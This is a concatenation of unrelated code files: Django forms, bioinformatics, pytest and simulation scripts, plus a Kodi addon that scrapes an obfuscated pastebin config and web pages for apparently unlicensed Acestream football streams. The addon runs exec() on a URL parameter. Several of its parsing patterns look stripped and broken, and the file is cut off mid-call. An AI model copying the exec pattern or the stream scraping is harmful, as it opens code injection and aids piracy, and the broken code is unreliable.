RecipeinfoForm(ModelForm):\n class Meta:\n model = Recipeinfo\n fields = ['image', 'description']\n\nRecipeinfoInlineFormSet = inlineformset_factory(Recipe, Recipeinfo,\n fields = ['image','description'],\n extra = 2)\n\nfoodinfoInlineFormSet = inlineformset_factory(Recipe, Foodinfo,\n fields = ['ingredient', 'quantity'],\n extra = 2)\n\n\n\n","repo_name":"kguong123/doremi","sub_path":"recipe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37583646185","text":"from utils import load_fasta_file_as_lookup\n\n\ndef build_adjacency_list(record_lookup, k=3):\n\n prefix_lookup = {}\n adjacency_list = {}\n\n # Create a lookup from prefix -> record name\n for prefix_name, dna in record_lookup.items():\n prefix = dna[:k]\n\n if prefix not in prefix_lookup:\n prefix_lookup[prefix] = []\n\n prefix_lookup[prefix].append(prefix_name)\n\n # Match suffixes using the prefix lookup\n for suffix_name, dna in record_lookup.items():\n\n suffix = dna[-k:]\n if suffix in prefix_lookup:\n prefix_names = prefix_lookup[suffix]\n\n for prefix_name in prefix_names:\n\n # Don't match an entry to itself\n if suffix_name != prefix_name:\n if suffix_name not in adjacency_list:\n adjacency_list[suffix_name] = []\n\n adjacency_list[suffix_name].append(prefix_name)\n\n return adjacency_list\n\n\nif __name__ == '__main__':\n\n fasta_record_lookup = load_fasta_file_as_lookup('problem_12_data.txt')\n adjacency_list = build_adjacency_list(fasta_record_lookup)\n\n for key, value_list in adjacency_list.items():\n for value in value_list:\n print(key, value)\n\n","repo_name":"JoshVarty/Rosalind","sub_path":"012_Overlap_Graphs.py","file_name":"012_Overlap_Graphs.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32196329388","text":"import factory\n\n\nCONTEXT_COLUMNS = ['pid', 'visit', 'collect_date']\nDUMMY_VISIT_TYPES = ['wk1', 'wk2', 'wk3', 'wk5']\n\n\nclass AssessmentTypeARecord(factory.Factory):\n pid = factory.Faker('uuid4')\n visit = factory.Faker('random_element', elements=DUMMY_VISIT_TYPES)\n collect_date = factory.Faker('date_time_this_year')\n foo = factory.Faker('word')\n bar = factory.Faker('pyint')\n\n\nclass AssessmentTypeBRecord(factory.Factory):\n pid = factory.Faker('uuid4')\n visit = factory.Faker('random_element', elements=DUMMY_VISIT_TYPES)\n collect_date = factory.Faker('date_time_this_year')\n baz = factory.Faker('word')\n caz = factory.Faker('pyint')\n\n\ndef populate_upload(upload, factory_class):\n \"\"\"\n Generates a single dummy column from the upload file\n \"\"\"\n\n import unicodecsv as csv\n import io\n\n with io.BytesIO() as buffer:\n fieldnames = CONTEXT_COLUMNS + upload.schema.attributes.keys()\n writer = csv.DictWriter(buffer, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerow(factory.build(dict, FACTORY_CLASS=factory_class))\n upload.project_file = buffer.getvalue()\n\n\ndef test_dummy(\n db_session,\n schema_factory,\n attribute_factory,\n study_factory,\n upload_factory\n ):\n \"\"\"\n It should be able to join two uploads into a single data frame\n \"\"\"\n\n from occams_imports.importers.utils.pivot import load_project_frame\n\n study = study_factory()\n\n schema_a_upload = upload_factory.create(\n study=study,\n schema__attributes={\n 'foo': attribute_factory.create(name='foo', type='string'),\n 'bar': attribute_factory.create(name='bar', type='number'),\n }\n )\n\n schema_b_upload = upload_factory.create(\n study=study,\n schema__attributes={\n 'baz': attribute_factory.create(name='baz', type='string'),\n 'caz': attribute_factory.create(name='caz', type='number'),\n }\n )\n\n populate_upload(schema_a_upload, AssessmentTypeARecord)\n populate_upload(schema_b_upload, AssessmentTypeBRecord)\n db_session.flush()\n\n frame = load_project_frame(db_session, study.name)\n\n expected_columns = [\n '_'.join([study.name, schema_a_upload.schema.name, a.name])\n for a in schema_a_upload.schema.iterleafs()\n ]\n expected_columns += [\n '_'.join([study.name, schema_b_upload.schema.name, a.name])\n for a in schema_b_upload.schema.iterleafs()\n ]\n assert set(expected_columns) < set(frame.columns)\n\n\ndef test_populate_project(\n db_session,\n study_factory,\n schema_factory,\n patient_factory,\n attribute_factory,\n site_factory):\n\n import pandas as pd\n import numpy as np\n\n from occams_studies import models as studies\n from occams_imports.importers.utils.pivot import populate_project\n\n target_project = study_factory()\n target_site = site_factory(name=target_project.name)\n\n target_schema = schema_factory()\n\n target_schema = schema_factory.create(\n attributes={\n 'gender': attribute_factory.create(name='gender', type='number'),\n 'collect_date': attribute_factory.create(\n name='collect_date', type='date'),\n }\n )\n\n target_project.schemata.add(target_schema)\n\n pid1 = patient_factory(site=target_site)\n pid2 = patient_factory(site=target_site)\n pid3 = patient_factory(site=target_site)\n\n data_dict = {\n 'pid': [\n pid1.pid,\n pid2.pid,\n pid3.pid\n ],\n 'visit': ['week4', 'week5', 'week6']\n }\n\n target_demographics = '{}_{}_gender'.format(\n target_project.name, target_schema.name)\n target_collecy_date = '{}_{}_collect_date'.format(\n target_project.name, target_schema.name)\n\n data_dict[target_demographics] = [0, 1, np.nan]\n data_dict[target_collecy_date] = ['2017-01-01', '2017-01-02', '2017-01-01']\n\n consolidated_frame = pd.DataFrame(data_dict)\n\n populate_project(\n db_session,\n target_project.name,\n consolidated_frame\n )\n\n patient1 = (\n db_session.query(studies.Patient)\n .filter_by(pid=pid1.pid)\n .one()\n )\n\n patient2 = (\n db_session.query(studies.Patient)\n .filter_by(pid=pid2.pid)\n .one()\n )\n\n patient3 = (\n db_session.query(studies.Patient)\n .filter_by(pid=pid3.pid)\n .one()\n )\n\n assert len(patient1.entities) == 1\n for entity in patient1.entities:\n assert entity['gender'] == 0\n assert entity['collect_date'] == '2017-01-01'\n\n assert len(patient2.entities) == 1\n for entity in patient2.entities:\n assert entity['gender'] == 1\n assert entity['collect_date'] == '2017-01-02'\n\n assert len(patient3.entities) == 1\n for entity in patient3.entities:\n assert entity['gender'] is None\n assert entity['collect_date'] == '2017-01-01'\n","repo_name":"razorlabs/occams_imports","sub_path":"tests/importers/utils/test_pivot.py","file_name":"test_pivot.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"73760384217","text":"import collections\nfrom cmath import inf\nimport random\n\nclass NetworkGenerator:\n def __init__(self) -> None:\n '''Class containing various functions for generation Network objects for the simulation to run on.\n A Network can also be provided via custom JSON file instead.\n '''\n self.info = \"Please see individual generator functions for more information.\"\n\n\n def output_Network_dictionary(self, node_dict, edge_dict):\n '''Returns dictionary containing all Node and Edge information for the newly generated Network.\n '''\n snapshot = {}\n\n edge_snapshots = []\n for edge_key in edge_dict:\n edge = edge_dict[edge_key]\n edge_raw = edge.__dict__\n edge_snapshots.append(edge_raw)\n snapshot[\"edges\"] = edge_snapshots\n\n node_snapshots = []\n for node_key in node_dict:\n node = node_dict[node_key]\n node_raw = node.__dict__ \n node_snapshots.append(node_raw)\n snapshot[\"nodes\"] = node_snapshots\n\n return snapshot\n\n\n def generate_complete_bidirectional_network_default_values(self, number_nodes):\n '''Generates a complete Network consisting of number_nodes Nodes, each connected to every other Node in both directions.\n This Network uses the following default value:\n node.intersection_time_cost = 0\n Please note that this NetworkGenerator function only generates the barebone structures necessary for a Network. \n All additional attributes will be loaded via \"DEFAULT_edge_values_config.json\" during the simulation process.\n '''\n number_nodes = number_nodes\n # create Node objects\n complete_network_node_ID_to_node = collections.defaultdict(lambda: None)\n complete_network_edge_ID_to_edge = collections.defaultdict(lambda: None)\n\n for node_index in range(0,number_nodes):\n node_ID = node_index\n new_node = GeneratorNode(node_ID)\n complete_network_node_ID_to_node[node_ID] = new_node\n \n # create Edge objects -- requires Nodes to exist first\n edge_index_counter = 0\n\n for start_node in range(0,number_nodes):\n for end_node in range(0,number_nodes):\n if start_node == end_node:\n pass # no looping roads allowed\n else:\n # ensure unique Edge IDs\n edge_ID = edge_index_counter\n edge_index_counter += 1\n new_inbound_edge = GeneratorEdge(edge_ID, start_node, end_node)\n complete_network_edge_ID_to_edge[edge_ID] = new_inbound_edge\n \n # return complete_network_node_ID_to_node, complete_network_edge_ID_to_edge\n network_dict = self.output_Network_dictionary(complete_network_node_ID_to_node, complete_network_edge_ID_to_edge)\n return network_dict\n\n\n def create_ER_network_default_values(self, number_nodes, probability_joining = 0.5):\n '''Creates an Erdos Renyi Network based on the given parameters:\n A each pair of nodes has a probability_joining (0 < p < 1) of being connected in an ER Network.\n As this is a directional Network, each pair will be considered separately per direction.\n This Network uses the following default values:\n probability_joining = 0.5 # can be overwriten via user input\n node.intersection_time_cost = 0\n Please note that this NetworkGenerator function only generates the barebone structures necessary for a Network. \n All additional attributes will be loaded via \"DEFAULT_edge_values_config.json\" during the simulation process.\n '''\n number_nodes = number_nodes\n # create Node objects\n complete_network_node_ID_to_node = collections.defaultdict(lambda: None)\n complete_network_edge_ID_to_edge = collections.defaultdict(lambda: None)\n\n for node_index in range(0,number_nodes):\n node_ID = node_index\n new_node = GeneratorNode(node_ID)\n complete_network_node_ID_to_node[node_ID] = new_node\n \n # create Edge objects -- requires Nodes to exist first\n edge_index_counter = 0\n\n for start_node in range(0,number_nodes):\n for end_node in range(0,number_nodes):\n if start_node == end_node:\n pass # no looping roads allowed\n else:\n # generate random number\n random_number = random.uniform(0,1)\n if random_number <= probability_joining:\n edge_ID = edge_index_counter\n edge_index_counter += 1\n new_inbound_edge = GeneratorEdge(edge_ID, start_node, end_node)\n complete_network_edge_ID_to_edge[edge_ID] = new_inbound_edge\n\n\nclass GeneratorNode:\n def __init__(self, id) -> None:\n '''Contains all attributes necessary for creating a network intersection (Node).\n Attributes:\n id: Unique ID associated with this Node object.\n intersection_time_cost: Value representing time in ticks required to cross intersection. 0 <= value < 1.\n '''\n self.id = id\n self.intersection_time_cost = 0 \n\n\nclass GeneratorEdge:\n def __init__(self, \n id, \n start_node_id, \n end_node_id, \n edge_length = None, \n max_speed = None, \n max_capacity = None \n ) -> None: \n '''Contains all attributes necessary for creating a road segment (Edge).\n Attributes generated in all NetworkGenerator functions:\n id: Unique ID associated with this Edge object.\n start_node_id: Node from which this Edge originates.\n end_node_id: Node from which this Edge terminates.\n Attributes generated only in probabilistic NetworkGenerator functions:\n edge_length: Physical length of the Edge (ex: meter length of a road).\n max_speed: (optional) Unit speed limit of the road. Without obstructions, this is the maximum distance a Car can move on this Edge in one tick.\n max_capacity: (optional) Maximum number of Car objects allowed on the Edge.\n '''\n self.id = id\n self.start_node_id = start_node_id\n self.end_node_id = end_node_id\n\n self.edge_length = edge_length\n self.max_speed = max_speed\n self.max_capacity = max_capacity\n","repo_name":"julialruiter/Traffic_Simulator","sub_path":"configs/UnderlyingNetworkGenerator.py","file_name":"UnderlyingNetworkGenerator.py","file_ext":"py","file_size_in_byte":6611,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"71736380376","text":"import datetime\n\ndef calculate_age(birthday):\n today = datetime.date.today()\n age = today.year - birthday.year\n return age\n\ndef input_entry():\n while True:\n try:\n name, birthday_str = input(\"Input your entry (name, DD/MM/YYYY): \").split(\", \")\n birthday = datetime.datetime.strptime(birthday_str, \"%d/%m/%Y\").date()\n if birthday > datetime.date.today():\n raise ValueError(\"Upcoming birthday\")\n if not name.isalpha():\n raise ValueError(\"Name containing number\")\n age = calculate_age(birthday)\n name = name.capitalize()\n database[name] = {\"birthday\": birthday, \"age\": age}\n print(f\"Successfully entered: {name}, {age} years old\")\n break\n except ValueError as e :\n print(e)\n\ndef read_entries():\n print(\"List of entries:\")\n for name in database:\n entry = database[name]\n print(f\"{name}, {entry['age']} years old\")\n\ndef delete_entry():\n name = input(\"Input the name of the entry you want to delete: \").capitalize()\n if name in database:\n del database[name]\n print(f\"Successfully deleted: {name}\")\n else:\n print(f\"{name} not found in the database\")\n\ndatabase = {}\n\nwhile True:\n action = input(\"What do you want to do (input, read, delete, exit): \")\n if action == \"input\":\n input_entry()\n elif action == \"read\":\n read_entries()\n elif action == \"delete\":\n delete_entry()\n elif action == \"exit\":\n print(\"Goodbye\")\n break\n else:\n print(\"Invalid action\")\n","repo_name":"AmrGamal-58/Ctds","sub_path":"Ctd-4.0.py","file_name":"Ctd-4.0.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71444590617","text":"# -*- coding: utf-8 -*-\n# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)\n# Gracias a la librería plugintools de Jesús (www.mimediacenter.info), PlatformCode y Core del Grupo Balandro (https://linktr.ee/balandro)\n\nimport os, sys, urllib, re, shutil, zipfile, base64\n#import xbmc, xbmcgui, xbmcaddon, xbmcplugin, requests\nimport xbmc, xbmcgui, xbmcaddon, xbmcplugin\nimport locale, time, random, plugintools\nimport resolvers\n\nif sys.version_info[0] < 3:\n import urllib2\nelse:\n import urllib.error as urllib2\n\nfrom core import httptools\nfrom core.item import Item\nfrom platformcode.config import WebErrorException\n\nusaHorus = True\nsetting = xbmcaddon.Addon().getSetting\nif setting('lanzarCon') == \"0\": ##0 = Solo Acestream 1 = Horus+Acestream\n usaHorus = False\n\n\naddonName = xbmcaddon.Addon().getAddonInfo(\"name\")\naddonVersion = xbmcaddon.Addon().getAddonInfo(\"version\")\naddonId = xbmcaddon.Addon().getAddonInfo(\"id\")\naddonPath = xbmcaddon.Addon().getAddonInfo(\"path\")\n\nversion=\"(v0.1.0)\"\ncomparaVersion = \"0.1.0\"\n\naddonPath = xbmcaddon.Addon().getAddonInfo(\"path\")\nmi_data = xbmc.translatePath(os.path.join('special://home/userdata/addon_data/plugin.video.FutbolTream/'))\nmi_addon = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.FutbolTream'))\n\nfondo = xbmc.translatePath(os.path.join(mi_addon,'fanart.jpg'))\nlogoprin = xbmc.translatePath(os.path.join(mi_addon,'icon.png'))\n\nmislogos = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.FutbolTream/jpg/'))\nlogo_transparente = xbmc.translatePath(os.path.join(mislogos , 'transparente.png'))\n\naudios = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.FutbolTream/audios/'))\nlasliao = xbmc.translatePath(os.path.join(audios, 'error.mp3'))\n\nhorusTorrent = \"eydhY3Rpb24nOiAncGxheScsICdmYW5hcnQnOiAnJywgJ2ljb24nOiAnTUktSUNPTk8nLCAndXJsJzogJ01JLVRPUlJFTlQnLCAnbGFiZWwnOiAnTUktVElUVUxPJ30=\" ## Para Torrents\nhorusAce = \"eydhY3Rpb24nOiAncGxheScsICdmYW5hcnQnOiAnTUktRkFOQVJUJywgJ2ljb24nOiAnTUktSUNPTk8nLCAnaWQnOiAnTUktSUQtQUNFJywgJ2xhYmVsJzogJ01JLVRJVFVMTyd9\" ##Para id-Aces\n\ndatosConf = httptools.downloadpage(base64.b64decode(\"aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzVxV3dTQ3FF\".encode('utf-8')).decode('utf-8')).data\nListaCentralAcotaInicio = plugintools.find_single_match(datosConf,'ListaCentralAcotaInicio>(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?)(.*?) comparaVersion:\n lin1 = \"[COLOR blue]Estás usando una versión obsoleta de FutbolTream. La versión actualizada es: [COLOR green][B]\"+versionActual+\"[/B][/COLOR]\"\n lin2 = \"\\n\" + \"Instala la nueva versión desde [COLOR yellow][B]Kelebek.[/B][/COLOR]\"\n xbmcgui.Dialog().ok( \"[COLOR lime]Versión NO Actualizada[/COLOR]\" , lin1+lin2 )\n\n\ndataWeb = httptools.downloadpage(web, headers=headers).data + \"\"\n\nguia_eventos = plugintools.find_multiple_matches(dataWeb,'(.*?)')\n\n\nif not os.path.exists(mi_data):\n\tos.makedirs(mi_data) # Si no existe el directorio, lo creo\n\n\ncabecera = \"[COLOR mediumslateblue][B] FutbolTream \"+version+\" [COLOR red] ····[COLOR yellowgreen]by AceTorr[COLOR red]····[/B][/COLOR]\"\n\t\n\n# Punto de Entrada\ndef run():\n\tplugintools.log('[%s %s] Running %s... ' % (addonName, addonVersion, addonName))\n\n\t# Obteniendo parámetros...\n\tparams = plugintools.get_params()\n \n\t\n\tif params.get(\"action\") is None:\n\t\tmain_list(params)\n\telse:\n\t\taction = params.get(\"action\")\n\t\texec(action+\"(params)\")\n \n\n\tplugintools.close_item_list() \n\n\n\n# Principal\ndef main_list(params):\n \n plugintools.add_item(action=\"\",url=\"\",title=cabecera,thumbnail=logoprin,fanart=fondo,folder=False,isPlayable=False)\n\n #if len(guia_eventos) > 0:\n if len(guia_eventos) > 0 and pongo_Agenda == \"SI\":\n plugintools.add_item(action=\"guiaEventos\",url=web,title='[COLOR lime]>>> Guía de Eventos (entrar) <<<[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n else:\n plugintools.add_item(action=\"\",url=\"\",title=\"[COLOR red]····Guia de Eventos temporalmente Inactiva en la Web····[/COLOR]\",thumbnail=logoprin,fanart=fondo,folder=False,isPlayable=False)\n \n if (\"Canales HD\" in dataWeb) and (\"Lucas_m_\" in dataWeb) and (\"@MANUK0S\" in dataWeb): ##Si están tituladas las 3 Listas del Centro de la página\n plugintools.add_item(action=\"bylucas\",url=web,title='[COLOR white]'+Lista1_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n plugintools.add_item(action=\"manukos\",url=web,title='[COLOR white]'+Lista2_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n plugintools.add_item(action=\"canalesHD\",url=web,title='[COLOR white]'+Lista3_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n else: ##Intentamos coger todos los links en una única lista\n plugintools.add_item(action=\"listaCentral\",url=web,title='[COLOR white]Recopilación Temporal de Listas [COLOR lime]>>entrar<< [COLOR coral](Faltan datos de creadores en la Web)[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n \n if \"Canales 365\" in dataWeb:\n plugintools.add_item(action=\"canales365\",url=\"\",title='[COLOR white]Canales 365[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n\n if \"NBA Tv\" in dataWeb:\n plugintools.add_item(action=\"nbaTV\",url=web,title='[COLOR white]'+Lista4_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n \n \n acotacion = \"a visionar<\"\n zapp = plugintools.find_single_match(dataWeb,acotacion+'(.*?) 0:\n plugintools.add_item(action=\"zapping\",url=\"\",title='[COLOR white]Zapping Arena[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n \n plugintools.add_item(action=\"\", url=\"\", title=\"\", genre=\"\", thumbnail=logo_transparente, fanart=fondo, folder=False, isPlayable=False)\n mensaje = \"[COLOR firebrick]*Este addon se suministra gratuitamente desde [COLOR yellow][B]Kelebek[/B][COLOR firebrick]. Si está en algún otro paquete, es sin la AUTORIZACIÓN de sus creadores.[/COLOR]\"\n plugintools.add_item(action=\"\", url=\"\", title=mensaje, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n \n if not usaHorus:\n mensaje = \"[COLOR aqua]**Recuerde abrir previamente [COLOR red]Acestream [COLOR aqua]si no tiene activado [COLOR yellow]Horus [COLOR aqua]en los Ajustes del Addon.[/COLOR]\"\n plugintools.add_item(action=\"\", url=\"\", title=mensaje, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\n\n\ndef guiaEventos(params):\n\n acotacion = 'class=\"title\">'\n elTitulo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n \n dia = plugintools.find_single_match(evento[0],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n hora = plugintools.find_single_match(evento[1],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n deporte = plugintools.find_single_match(evento[2],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n competicion = plugintools.find_single_match(evento[3],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n partido = plugintools.find_single_match(evento[4],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n evento[5] = evento[5].replace(\"
\" , \" y \")\n canales = plugintools.find_single_match(evento[5],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n \n titu = \"\"\n titu = \"[COLOR white]-\" + dia + \" [COLOR lime](\" + hora + \") [COLOR orange] \" + deporte.title()\n titu = titu + \": \" + competicion.title() + \"-> [COLOR blue] \" + partido + \": [COLOR red]\" + canales + \"[/COLOR]\"\n \n plugintools.add_item(action=\"laLiaste\", url=\"\", title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n \n '''\n aCanal = [\"\",\"\"]\n if \"
\" in evento[5]: ## Hay mas de 1 canal para el evento\n #class=\"auto-style3\">9-10 [SPA]
17-18 [SPA]\n can2 = evento[5].replace(\"td>\" , \"\").replace(\"\\n\" , \"\") + \"<\"\n aCanal[0] = plugintools.find_single_match(can2,'>(.*?)(.*?)<')\n else:\n aCanal[0] = plugintools.find_single_match(evento[5],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n \n for canales in aCanal:\n if len(canales) > 0:\n ##Vamos a localizar el link del partido\n can2 = \">\" + canales.replace(\"[\" , \"<\")\n elCanal = plugintools.find_single_match(can2,'>(.*?)<').strip()\n #plugintools.log(\"*****************Canales: \"+canales+\"********************\")\n \n #Lo busco en el grupo \"a visionar\"\n acotacion = \"a visionar<\"\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n link = \"\"\n for item in lineas:\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<').strip()\n if titulo == elCanal:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n \n titu = \"\"\n if len(link) > 0: ## Tenemos Link, podemos poner el evento en Pantalla\n titu = \"[COLOR white]-\" + dia + \" [COLOR lime](\" + hora + \") [COLOR orange] \" + deporte.title()\n titu = titu + \": \" + competicion.title() + \"-> [COLOR blue] \" + partido + \" [COLOR red]\" + canales + \"[/COLOR]\"\n \n if \"acestream\" in link:\n horus = horusAce\n link = link.replace(\"acestream://\" , \"\")\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , partido)\n #plugintools.log(\"*****************Remplaza: \"+reemplaza+\"********************\")\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n '''\n\n\n\n\n\ndef listaCentral(params):\n \n acotacion = ListaCentralAcotaInicio\n acotaFin = ListaCentralAcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n #plugintools.log(\"*****************Titu: \"+titulo+\"********************\")\n #plugintools.log(\"*****************Link: \"+link+\"********************\")\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\ndef bylucas(params): ##Lista 1\n \n acotacion = Lista1_AcotaInicio\n acotaFin = Lista1_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\ndef canalesHD(params): ##Lista 3\n \n acotacion = Lista3_AcotaInicio\n acotaFin = Lista3_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n #plugintools.log(\"*****************Titu: \"+titulo+\"********************\")\n #plugintools.log(\"*****************Link: \"+link+\"********************\")\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\ndef manukos(params): ##Lista 2\n \n acotacion = Lista2_AcotaInicio\n acotaFin = Lista2_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, 